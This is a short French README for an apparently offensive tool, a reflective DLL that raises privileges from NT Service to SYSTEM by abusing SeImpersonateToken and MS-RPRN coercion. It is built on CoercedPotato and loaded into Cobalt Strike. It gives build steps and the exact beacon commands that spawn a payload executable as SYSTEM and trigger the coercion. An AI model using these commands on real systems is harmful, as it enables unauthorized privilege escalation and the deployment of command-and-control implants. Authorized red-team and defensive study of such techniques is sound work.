
DLL réflexive pour élever les privilèges de NT Service à SYSTEM en utilisant le privilège SeImpersonateToken
Élévation de privilèges de NT Service à SYSTEM en utilisant le privilège SeImpersonateToken et les fonctions MS-RPRN.
Fortement basé sur https://github.com/Prepouce/CoercedPotato
Reflective Loader de https://github.com/stephenfewer/ReflectiveDLLInjection.
Clonez ce dépôt et compilez le projet dans VisualStudio, puis chargez dist/coercedpotato.cna dans CobaltStrike.
Vous devez d'abord lancer le listener RPC avec
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
par exemple
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
ensuite vous pouvez déclencher un appel SYSTEM
beacon> CoercedPotato coerce